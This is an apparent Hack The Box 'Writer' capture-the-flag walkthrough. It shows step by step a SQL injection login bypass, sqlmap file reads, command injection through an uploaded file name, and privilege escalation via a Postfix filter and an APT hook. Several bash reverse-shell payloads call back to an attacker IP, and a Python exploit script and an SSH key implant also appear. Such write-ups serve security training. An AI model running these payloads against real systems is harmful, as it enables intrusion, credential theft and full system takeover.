HTB Writer Walkthrough

Scanning

Let’s begin with a SYN port scan to find all the open ports on the target machine:

1
nmap -Pn -sS -p- -T4 -vv -oX nmap_syn_complete.xml writer.htb
Port State Service Reason Product Version Extra Info
22 tcp open ssh syn-ack
80 tcp open http syn-ack
139 tcp open netbios-ssn syn-ack
445 tcp open microsoft-ds syn-ack

And then, let’s proceed identifying the active services on those ports:

1
nmap -Pn -sS -sV -sC -p 22,445,139,80 -T4 -vv -oX nmap_limited_complete.xml writer.htb
Port State Service Reason Product Version Extra Info
22 tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80 tcp open http syn-ack Apache httpd 2.4.41
139 tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445 tcp open netbios-ssn syn-ack Samba smbd 4.6.2

To sum up, there are four active services on the target machine: SSH, HTTP, and SMB. I can now enumerate them to find anythin interesting.

Enumeration

SMB

The first service I’m going to look at is SMB. SMB is a protocol used by Windows to share files and directories. It’s a very common protocol, and it’s used by many popular file sharing services. If it’s open, I can enumerate the shared directories on the target machine and access the files inside of them.

In order to do this, I use the enum4linux tool which output is reported as follows (I’ve redacted it to make it easier to read and to highlight the important bits):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
( Target Information )

Target ........... writer.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

( Nbtstat Information for writer.htb )

Looking up status of 10.10.11.101
WRITER <00> - B <ACTIVE> Workstation Service
WRITER <03> - B <ACTIVE> Messenger Service
WRITER <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

( Session Check on writer.htb )

[+] Server writer.htb allows sessions using username '', password ''

( Users on writer.htb )

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: kyle Name: Kyle Travis Desc:

( Share Enumeration on writer.htb )


Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
writer2_project Disk
IPC$ IPC IPC Service (writer server (Samba, Ubuntu))

[+] Attempting to map shares on writer.htb

//writer.htb/print$ Mapping: DENIED, Listing: N/A
//writer.htb/writer2_project Mapping: DENIED, Listing: N/A
//writer.htb/IPC$
[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

( Password Policy Information for writer.htb )

[+] Attaching to writer.htb using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] WRITER
[+] Builtin

[+] Password Info for Domain: WRITER

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kyle (Local User)
S-1-22-1-1001 Unix User\john (Local User)

[+] Enumerating users using SID S-1-5-21-1663171886-1921258872-720408159 and logon username '', password ''

S-1-5-21-1663171886-1921258872-720408159-501 WRITER\nobody (Local User)
S-1-5-21-1663171886-1921258872-720408159-513 WRITER\None (Domain Group)
S-1-5-21-1663171886-1921258872-720408159-1000 WRITER\kyle (Local User)

So, what I can see is that the SMB domain is WRITER. I can also see that it has two users: kyle and john. The password policy has a very low minimum length requirement, so I could try to bruteforce their credentials, but I don’t want to proceed that way. Last but not least, I can see a shared folder called writer2_project, but the listing is disabled and I can’t see any of the files inside of it.

HTTP

The second service I invesigate is the HTTP web server on the port 80. The web application are often the cause of the compromise, so I’m going to focus on it.

The application seems to be a simple blog-like platform, inside of which users can write and share some kind of content.

I can enumerate the users and the content they have written, but I’m not sure this could be useful. In the first place I’ve written down the list of the posts authors in case of future use.

First of all, I run (my best friend) fuff to enumerate the accessible directory on the target server (sorry not have taken screenshots of the output 🙏). As a result, I get the administrative directory, which seems to be very interesting, since it contains a login page.

Two approaches come to my mind: either I can bruteforce the login page based on the usernames collected from the blog posts and from the SMB enumeration, or I can try some sort of login bypass. Trying the first one, no luck.

Before using sqlmap to check if the request is vulnerable to SQL injection, I try some of the most common login bypass techniques. Luckly, the first payload I try works as a charm and I can login as an administrator:

1
2
USERNAME: ' OR 1=1-- -'
PASSWORD: anything

Having access to the administration dashboard, I can have a look at the platform functionalities in order to expand my attach surface. An admin basically has the ability to create, edit and delete posts, and also to attach files to them, using a local file or a remote one. The first thing I want to focus on is the file upload feature, that could help me reach a RCE.

Playing with it I can deduce that:

  1. the uploaded files needs to have a .jpg extension;
  2. the uploaded files are placed at the /img/filename.jpg location;
  3. changing the extension of a PHP file to .jpg, it is uploaded but its content are not executed.
    Neither manual nor automated fuzzing was able to find a way to upload an executable file (again, thanks to my best friend fuff and the PayloadsAllTheThings repo).

Having no clue about how to overcame this, I decided to exploit the previous identified SQL injection vulnerability using sqlmap to enumerate the database content looking for valid credentials that could help me to login into SSH. The database contains three tables: site, stories and users.
The users table only contains one row, but its hash seems to be not crackable in the first instance.

1
2
3
4
5
6
7
8
9
10
11
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | admin@writer.htb | Active | 118e48794631a9612484ca8b55f622d0 | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+

Having no idea how to go further, I decided to try to check for DBMS permissions and (luckly) I find that the current user can access files on the local system:

1
2
3
4
5
6
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
database management system users privileges:
[*] 'admin'@'localhost' [1]:
privilege: FILE

In order to be sure that the permissions work as inteded, I try to dump the /etc/passwd file and it succeeds:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --file-read=/etc/passwd
-----
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false

I need read the Apache2 virtual host configuration file in order to have a better idea of the web application’s location, but I cannot remember what its path is. To overcome this, I use a techique that LiveOverflow showed in one of his vieos (probably this one, but I’m not super-sure): to use docker containers to have an empty “clone” of the target environment to navigate it and analyze its content.

1
2
3
4
5
docker pull ubuntu/apache2

docker run -d ubuntu/apache2

docker exec -it a676098665d00988b138298c8ae41391cd742cf008ec67dd2e235fd3c783f935 /bin/bash

So, using the ubuntu/apache2 image and sqlmap (of course) I can dump what I need: the /etc/apache2/sites-enabled/000-default.conf file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Virtual host configuration for writer.htb domain
<VirtualHost *:80>
ServerName writer.htb
ServerAdmin admin@writer.htb
WSGIScriptAlias / /var/www/writer.htb/writer.wsgi
<Directory /var/www/writer.htb>
Order allow,deny
Allow from all
</Directory>
Alias /static /var/www/writer.htb/writer/static
<Directory /var/www/writer.htb/writer/static/>
Order allow,deny
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

# Virtual host configuration for dev.writer.htb subdomain
# Will enable configuration after completing backend development
# Listen 8080
#<VirtualHost 127.0.0.1:8080>
# ServerName dev.writer.htb
# ServerAdmin admin@writer.htb
#
# Collect static for the writer2_project/writer_web/templates
# Alias /static /var/www/writer2_project/static
# <Directory /var/www/writer2_project/static>
# Require all granted
# </Directory>
#
# <Directory /var/www/writer2_project/writerv2>
# <Files wsgi.py>
# Require all granted
# </Files>
# </Directory>
#
# WSGIDaemonProcess writer2_project python-path=/var/www/writer2_project python-home=/var/www/writer2_project/writer2env
# WSGIProcessGroup writer2_project
# WSGIScriptAlias / /var/www/writer2_project/writerv2/wsgi.py
# ErrorLog ${APACHE_LOG_DIR}/error.log
# LogLevel warn
# CustomLog ${APACHE_LOG_DIR}/access.log combined
#
#</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

So there are two virtual hosts: the first one (hit by default on every route) points to the blog platform already analyzed, and the second one is a “under development” plaform which is unaccessible right now cause it has been commented out. It’s important to notice that both of them uses mod_wsgi Apache module that enables to run Python web applications. In addition, the WSGIScriptAlias directive configures the server to execute the writer.wsgi script anytime a request is received on the / route.

The writer.wsgi content (that I got via sqlmap as the previous ones) is the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/python
import sys
import logging
import random
import os

# Define logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0,"/var/www/writer.htb/")

# Import the __init__.py from the app folder
from writer import app as application
application.secret_key = os.environ.get("SECRET_KEY", "")

It imports the __init__.py file which contains the main logic of a Flask application, which is the source of the previous blog platform (again, I’ve extracted the most important parts of it, since it is a huge one):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --file-read=/var/www/writer.htb/writer/__init__.py

----
[...]
#Define connection for database
def connections():
try:
connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')
return connector
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
return ("Something is wrong with your db user name or password!")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
return ("Database does not exist")
else:
return ("Another exception, returning!")
else:
print ('Connection to DB is ready!')
[...]
@app.route('/dashboard/stories/edit/<id>', methods=['GET', 'POST'])
def edit_story(id):
if not ('user' in session):
return redirect('/')
try:
connector = connections()
except mysql.connector.Error as err:
return ("Database error")
if request.method == "POST":
cursor = connector.cursor()
cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
results = cursor.fetchall()
if request.files['image']:
image = request.files['image']
if ".jpg" in image.filename:
path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename)
image.save(path)
image = "/img/{}".format(image.filename)
cursor = connector.cursor()
cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
result = connector.commit()
else:
error = "File extensions must be in .jpg!"
return render_template('edit.html', error=error, results=results, id=id)
if request.form.get('image_url'):
image_url = request.form.get('image_url')
if ".jpg" in image_url:
try:
local_filename, headers = urllib.request.urlretrieve(image_url)
os.system("mv {} {}.jpg".format(local_filename, local_filename))
image = "{}.jpg".format(local_filename)
try:
im = Image.open(image)
im.verify()
im.close()
image = image.replace('/tmp/','')
os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
image = "/img/{}".format(image)
cursor = connector.cursor()
cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
result = connector.commit()

except PIL.UnidentifiedImageError:
os.system("rm {}".format(image))
error = "Not a valid image file!"
return render_template('edit.html', error=error, results=results, id=id)
except:
error = "Issue uploading picture"
return render_template('edit.html', error=error, results=results, id=id)
else:
error = "File extensions must be in .jpg!"
return render_template('edit.html', error=error, results=results, id=id)
title = request.form.get('title')
tagline = request.form.get('tagline')
content = request.form.get('content')
cursor = connector.cursor()
cursor.execute("UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s", {'title':title, 'tagline':tagline, 'content':content, 'id': id})
result = connector.commit()
return redirect('/dashboard/stories')

else:
cursor = connector.cursor()
cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
results = cursor.fetchall()
return render_template('edit.html', results=results, id=id)
[...]

It’s quite easy to see that the post creation and editing have a really poor implementation of the remote image upload mechanism since they use the os.system function to run the mv command to move the temporary image file (created using the urlretrive function) into the static/img directory. This is not a good way to handle it, since the file name is under the user’s control and it can be used to forge a payload to execute arbitrary commands on the system.

Something important to notice is that the urlretrieve function, used to copy a remote object in a temporary location, usually doesn’t use the original object name: in fact, it generates a random one. This could make think that the application code isn’t vulnerable since the user can’t control the string used inside the os.system function. However, this is not the case. In fact, as the official documentation states, If the URL points to a local file, the object will not be copied unless filename is supplied, and the original file name is returned. Moreover, the file type check is not implemented in a good way, since it just checks if the .jpg string is present in the file name.

Exploit

RCE

We can chain the previous vulnerabilities together to get a complete RCE:

  1. uploading a file having a bash injection payload in its name in order: this makes it possible to have a file with a command inside its name, located in a local directory (/var/www/writer.htb/writer/static/img/)
    1
    2
    echo "bash -i >& /dev/tcp/10.10.14.146/8756 0>&1" | base64
    YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDYvODc1NiAwPiYxCg==
  2. using the post editing end-point to modify an existing content image using the local path:
    1
    file:///var/www/writer.htb/writer/static/img/file.jpg `payload`
  3. the resulting os.system function is:
    1
    os.system("mv /var/www/writer.htb/writer/static/img/file.jpg `echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDYvODc1NiAwPiYxCg==' | base64 -d | bash ` ...".format(local_filename, local_filename))

Looking around

The www-data user has no home directory, so it’s not usefull to get the first flag. This means that at least one lateral movement is needed to achieve the first step.

Looking around, I find that the “dev” project referenced inside the virtual host configuration is still there and is fully readable. It is a Django application not so interesting since it’s not running, but it still contains some configuration files. One of these, called settings.py, references a MySQL configuration file at /etc/mysql/my.cnf, which is also readable.

This file exposes some MySQL credentials, which can be used to navigate the dev database (which is different from the previous one dumped via sqlmap):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# The MariaDB configuration file
#
# The MariaDB/MySQL tools read configuration files in the following order:
# 1. "/etc/mysql/mariadb.cnf" (this file) to set global defaults,
# 2. "/etc/mysql/conf.d/*.cnf" to set global options.
# 3. "/etc/mysql/mariadb.conf.d/*.cnf" to set MariaDB-only options.
# 4. "~/.my.cnf" to set user-specific options.
#
# If the same option is defined multiple times, the last one will apply.
#
# One can use all long options that the program supports.
# Run program with --help to get a list of available options and with
# --print-defaults to see which it would actually understand and use.

#
# This group is read both both by the client and the server
# use it for options that affect everything
#
[client-server]

# Import all .cnf files from configuration directory
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

[client]
database = dev
user = djangouser
password = DjangoSuperPassword
default-character-set = utf8

Now I can interact with the database and look for credentials which can be still valid somewhere. As expected, inside the auth_user table there is a valid username/password pair:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@writer:/var/www/writer2_project/writerv2$ mysql --user=djangouser --password=DjangoSuperPassword dev
-----
MariaDB [dev]> show tables;
show tables;
+----------------------------+
| Tables_in_dev |
+----------------------------+
| auth_group |
| auth_group_permissions |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| django_admin_log |
| django_content_type |
| django_migrations |
| django_session |
+----------------------------+
10 rows in set (0.001 sec)

MariaDB [dev]> select * from auth_user;
select * from auth_user;
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| id | password | last_login | is_superuser | username | first_name | last_name | email | is_staff | is_active | date_joined |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| 1 | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= | NULL | 1 | kyle | | | kyle@writer.htb | 1 | 1 | 2021-05-19 12:41:37.168368 |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
1 row in set (0.001 sec)

The hash prefix points out that the password is stored using the PBKDF2 algorithm. The hash is then followed by the number of iterations, the salt and the hash itself. I can try to crack it using John the Ripper, which supports that format:

Note: I had some troubles formatting the hash file, even if I’ve not found any other references around the web. The only way to make it work has been manually format the file in this way:

1
kyle:$django$*1*pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=

User flag

The collected credentials are valid to login SSH using the kyle user. This way I’m able to read the user flag: a049fd994d4b5fb84aef8c72373e26af:

Privilege Escalation

John user

After running linPEAS, I notice that kyle is the only user of the filter group:

What the filter group allows to additionally do? Well, it makes it possible to edit the /etc/postfix/disclaimer:

1
2
3
(remote) kyle@writer:/home/kyle$ find / -group filter 2> /dev/null
/etc/postfix/disclaimer
/var/spool/filter

The/etc/postfix/disclaimer file, seems to be a Postfix Filter that is executed by John everytime
a mail is sent. The file contains a disclaimer that is displayed to the user when he/she tries to send a mail:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/bin/sh
# Localize these.
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail

# Get disclaimer addresses
DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses

# Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69

# Clean up when done or when aborting.
trap "rm -f in.$$" 0 1 2 3 15

# Start processing.
cd $INSPECT_DIR || { echo $INSPECT_DIR does not exist; exit
$EX_TEMPFAIL; }

cat >in.$$ || { echo Cannot save mail to file; exit $EX_TEMPFAIL; }

# obtain From address
from_address=`grep -m 1 "From:" in.$$ | cut -d "<" -f 2 | cut -d ">" -f 1`

if [ `grep -wi ^${from_address}$ ${DISCLAIMER_ADDRESSES}` ]; then
/usr/bin/altermime --input=in.$$ \
--disclaimer=/etc/postfix/disclaimer.txt \
--disclaimer-html=/etc/postfix/disclaimer.txt \
--xheader="X-Copyrighted-Material: Please visit http://www.company.com/privacy.htm" || \
{ echo Message content rejected; exit $EX_UNAVAILABLE; }
fi

$SENDMAIL "$@" <in.$$

exit $?

The idea is to edit the disclaimer filter in order to add a custom piece of code that spawns a reverse shell, which will makes us able to connect as john. Since a cron job is running every 4-5 minutes to restore the original files, it’s better to write a small python script that automates the entire exploitation process:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/python3.8
import smtplib

FILE = "/etc/postfix/disclaimer"
IP = "10.10.14.12"
PORT = "1337"

def patch_disclaimer():
print("patching %s..." % FILE)
file = open(FILE, "w")
file.write("#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n" % (IP, PORT))
print("file patched, spawning the shell...")

server = smtplib.SMTP('localhost')
patch_disclaimer()
server.sendmail('root@azraelsec.it', 'john@idk.com', 'lulz')
server.quit()

Listening on port 1337, I can interact with the remote server using the john user:

I want have a persistent session since I don’t want to re-run the entire process in case of of connection loss. And since I’m trying a tiny tool called pwncat, I use one of its modules called linux.implant.authorized_key to install a custom SSH keypair in /home/john/.ssh/authorized_keys to be able to use SSH:

Root user

The first thing I notice is that john belongs to the management group and considering how the previous steps developed, I start look around for resources that only that group’s users can access:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
john@writer:~$ find / -group management 2> /dev/null
/etc/apt/apt.conf.d
john@writer:~$ ls -al /etc/apt/apt.conf.d/
total 48
drwxrwxr-x 2 root management 4096 Jul 28 09:24 .
drwxr-xr-x 7 root root 4096 Jul 9 10:59 ..
-rw-r--r-- 1 root root 630 Apr 9 2020 01autoremove
-rw-r--r-- 1 root root 92 Apr 9 2020 01-vendor-ubuntu
-rw-r--r-- 1 root root 129 Dec 4 2020 10periodic
-rw-r--r-- 1 root root 108 Dec 4 2020 15update-stamp
-rw-r--r-- 1 root root 85 Dec 4 2020 20archive
-rw-r--r-- 1 root root 1040 Sep 23 2020 20packagekit
-rw-r--r-- 1 root root 114 Nov 19 2020 20snapd.conf
-rw-r--r-- 1 root root 625 Oct 7 2019 50command-not-found
-rw-r--r-- 1 root root 182 Aug 3 2019 70debconf
-rw-r--r-- 1 root root 305 Dec 4 2020 99update-notifier

APT can be used to escalate privileges as GTFOBINS points out: [https://gtfobins.github.io/gtfobins/apt-get/]. The most common scenario is to exploit the APT hooks to execute a small set of instructions when the privileged process executes an action (e.g. apt-get update). To place a custom file inside the /etc/apt/apt.conf.d is enough to create a custom APT hook. See the documentation to investigate further. The problem here is that I haven’t the john password, so I cannot use sudo to execute apt-get update. My only chance is to find some kind of triggers that does it for me.

I have low privileges but I still need to find a process run by someone else: how can I do that? Looking on Github I findpspy which is a tool that tries to figure out which processes are run just using the low lever os call to observe the file changes (more details abount its implementation can be found here).

Running it, I see that apt-get update gets executed in loop after a certain amount of time. This is the trigger I was looking for: if I put a custom file in /etc/apt/apt.conf.d and run apt-get update it will be executed as root. Moreover, the tool output shows (I’ve marked it in blue) the processes that clear the default configuration files that I mentioned talking about the Postfix filter.

Easy, now I just write a file called 00-azraelsec inside the /etc/apt/apt.conf.d folder with the following content and I just wait for a connection:

1
APT::Update::Pre-Invoke {"/bin/bash -i >& /dev/tcp/10.10.14.12/1337 0>&1";};

Then I just go to /root and I read the root.txt file: